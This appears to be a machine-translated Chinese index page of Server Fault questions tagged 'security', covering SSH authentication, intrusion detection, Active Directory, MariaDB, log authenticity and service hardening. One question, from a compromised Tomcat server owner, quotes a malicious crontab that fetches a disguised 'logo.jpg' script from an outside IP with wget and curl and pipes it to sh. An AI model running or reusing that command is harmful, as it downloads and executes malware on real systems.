Questions tagged «security»

我希望能够让一组用户使用公钥身份验证进行身份验证，而其他用户则使用密码身份验证。 Linux上的OpenSSH是否可能？如果是这样，我该怎么办？ 看完之后/etc/ssh/sshd_config，似乎我仅限于启用密钥认证或使用PAM。

9 linux  security  ssh 

我希望Samhain监视文件，例如/root/somefile。该文件当前不存在，但是如果要在任何时候创建该文件，我希望得到通知。 我将此添加到samhainrc： [ReadOnly] file = /root/somefile 这导致Samhain发出以下日志条目： Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT : [2018-10-18T22:54:04+0000] interface=<lstat>, msg=<No such file or directory>, userid=<0>, path=</root/somefile> Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT : [2018-10-18T22:54:04+0000] msg=<POLICY MISSING>, path=</root/somefile> Oct 18 22:54:19 ip-172-31-24-115 Samhain[17157]: INFO : [2018-10-18T22:54:19+0000] msg=<Checking [ReadOnly]>, path=</root/somefile> Oct 18 22:54:19 ip-172-31-24-115 Samhain[17157]: …

8 linux  security  intrusion-detection 

我有大约200个用户。 亚洲有50个，南欧和东欧有50个，西欧有100个。 我想指出亚洲的50个用户指向我们在亚洲的DC，目前看来他们正在向我们的欧洲服务器进行身份验证，从而导致大量延迟。 是什么引起的，或者什么可以解决我的问题？

8 windows  windows-server-2008  active-directory  security 

在Apache tomcat服务器上运行项目大战时，我发现该服务器已受到威胁。 在对未知分子进行战争时，cron像这样 [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh 下载的文件logo.jpg带有正在下载恶意软件的外壳程序脚本。 我在下面的这个网站上发现了类似的问题 https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/ 和 /security/160068/kworker34-malware-on-linux 我无法在整个代码中找到此cron调度程序的来源。 我想知道有人遇到过这个问题吗？以及如何在代码中查找调度程序的来源。 注意： 我正在研究JAVA（Struts 2）+ jsp + javascript + jquery Web项目。 每次我使用项目的war文件启动tomcat时，都会运行此调度程序，但是我无法在代码中找到任何用于调度程序的调度程序。 我在日志文件中找到了以下行 [INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - …

8 linux  shell  security  tomcat 

关闭。这个问题是题外话。它当前不接受答案。 想改善这个问题吗？ 更新问题，使它成为服务器故障的主题。 3年前关闭。 当特定事件出现在Windows日志中-Windows网络上的任何位置时，最简单的获取通知的方法是。

8 security  windows-event-log 

我刚安装MariaDb在新的Ubuntu Gnome上，然后运行mysql_secure_installation，在那里我设置了不错的管理员密码，删除了匿名用户，等等。 之后，我意识到有关管理员密码的一些奇怪行为： 如果我尝试使用命令从普通用户帐户登录，我mysql -u root -p总是会收到错误消息：ERROR 1698 (28000): Access denied for user 'root'@'localhost' 我敢肯定我输入了我之前使用mysql_secure_installation设置的正确密码... 当我使用root从root运行命令时sudo mysql -u root -p，无论我实际输入哪个密码，我都始终可以访问数据库... 这是正常现象吗，我做错了什么吗？还是以某种方式搞砸了安装？

8 security  mariadb  authorization 

kalilinux 2016的最新metasploit（最新稳定版） systemctl start postgresql OK 在msfconsole上 msf > db_status [*] postgresql connected to msf 当我启动搜索 msf > search samba [!] Module database cache not built yet, using slow search 所以我重建缓存... msf > db_rebuild_cache 当我启动搜索时 msf > search samba [!] Module database cache not built yet, using slow search 奇怪！如何解决这个问题？

8 linux  security 

该问题是针对@SwiftOnSecurity的Twitter线程的：https ://twitter.com/SwiftOnSecurity/status/655208224572882944 阅读完该线程后，我仍然不太明白为什么您要禁用本地帐户的网络登录。 所以这就是我的想法，请在错误之处纠正我： 假设我有一个具有DC和多个客户端的AD。客户之一是约翰。因此，早上，约翰开始工作，并使用AD凭据登录到台式机。中午，John出去开会，并“锁定”他的计算机（Windows + L）。然后，他需要使用个人笔记本电脑远程（通过RDP或其他方式）连接到办公室的PC。但是，使用这项新政策，他将无法做到。 Securitay给出的解释是密码不固定。但是，在这种情况下，攻击者将如何获得访问权限？密码不固定在哪一端？还是我心目中的情况与她想说的完全无关？如果是这样，她实际上想说什么？

8 windows  active-directory  security  group-policy  windows-server-2012-r2 

背景：远程日志聚合被认为是提高安全性的一种方法。通常，这解决了危害系统的攻击者可以编辑或删除日志以破坏取证分析的风险。我一直在研究通用日志工具中的安全性选项。 但是有些不对劲。我看不到如何配置任何常见的远程记录器（例如rsyslog，syslog-ng，logstash）以验证传入消息确实是来自所声称的主机的。在没有某种策略约束的情况下，一个日志创建者可以代表另一个日志创建者伪造消息。 rsyslog的作者似乎警告要验证日志数据： 最后一个警告：transport-tls保护发送方和接收方之间的连接。它不一定能防御消息本身中存在的攻击。特别是在中继环境中，该消息可能源自恶意系统，该恶意系统将无效的主机名和/或其他内容放入其中。如果没有针对此类情况的配置，则这些记录可能会显示在接收者的存储库中。-transport-tls不能防止这种情况的发生（但是如果正确使用它可能会有所帮助）。请记住，syslog-transport-tls提供了逐跳安全性。它不提供端到端的安全性，并且不对消息本身（仅是最后一个发送者）进行身份验证。 因此，后续问题是：什么是可以提供一定程度真实性的良好/实用配置（在您选择的任何常用日志工具中-rsyslog，syslog-ng，logstash等）？ 或者...如果没有人对日志数据进行身份验证，那为什么不呢？ - （此外：在讨论/比较中，使用RFC 5424中的某些图表或术语可能会有所帮助：第4.1节：示例部署方案 -例如，“发起者” vs“中继” vs“收集器”）

8 security  logging  rsyslog  logstash  syslog-ng 

我有一个Debian专用服务器。我正在尝试保护它的安全，我认为一种不错的方法是关闭不需要的服务，例如FTP。 我建议在部署时运行以下内容： service ntp stop update-rc.d -f ntp remove service vsftpd stop update-rc.d -f vsftpd remove service xinetd stop update-rc.d -f xinetd remove 我是新来的。通常这样做是否被认为是较差的安全性，并使用来将其锁定在服务上iptables，还是完全建议删除服务并最终更安全？

8 linux  security  debian 

我的免费AWS帐户已过期。我删除了所有S3和EC2资源，但是如果我可以离开Key Pairs且Security Groups无需付费则在徘徊。（我的帐户资源现在看起来像这样：Resources） Amazon的文档似乎没有提到此问题。 这些资源需要花钱吗？

8 security  amazon-ec2  amazon-web-services  amazon-s3  resources 

我们已经有的通配符证书*.mycompany.com。我们的网络具有只能在内部访问的主机。它们都属于该internal.mycompany.com子域。有一个主机名server.internal.mycompany.com用于其上部署了通配符证书的专用服务器。 当我访问Web服务器时，出现主机名不匹配错误。我是否真的必须获得另一个通配符证书，*.internal.mycompany.com或者是否有另一种（免费！

8 security  ssl-certificate  subdomain  domain 

想想一家网络托管公司，该公司希望让用户通过ssh管理文件和git存储库。这包括： 安全副本（scp） 创建，复制，移动/重新命名和删除文件 执行一小部分命令进行源代码控制和文本编辑（git，vim，nano） 我们想要实现这一点，并研究了以下选项： rssh 轻松地 这些将允许使用scp部分，但似乎无法使用git。Launchpad中有一个补丁，但是我不确定该怎么做。也有git-shell，但似乎不允许编辑器。也许vim太多了，因为它可以用于执行更多代码，因此如果太多，我们可以删除它（如果需要，可以完全删除vim或文本编辑器）。 我们基本上想锁定外壳，以便用户可以管理（和编辑）文件和git存储库，但是用户应该不能执行系统上的任何其他程序。最大的问题是网络和计算资源的滥用，但也将系统用作代理。随便你 有没有办法做到这一点，或者我们甚至可能对这个问题有错误的做法？

8 linux  security 

我曾经提到过保护/ dev / shm和/ proc的安全，我想知道您如何做到这一点以及它的作用是什么？我认为这涉及对/etc/sysctl.conf的某种编辑。 像这些？ kernel.exec-shield = 1 kernel.randomize_va_space = 1

8 linux  security  kernel 

在过去的几天中，我们的半繁忙邮件服务器（sendmail）中有许多来自发出垃圾命令的主机的入站连接。 在过去两天中： 来自39,000个唯一IP的无效命令的传入smtp连接 IP来自世界各地，而不仅仅是我可以阻止的几个网络 邮件服务器为整个北美的用户提供服务，所以我不能只是阻止来自未知IP的连接 示例错误命令：http : //pastebin.com/4QUsaTXT 除了让我烦恼之外，我不确定有人会用这种攻击来完成什么。 有什么想法，或者如何有效地处理它？

8 linux  security  smtp  sendmail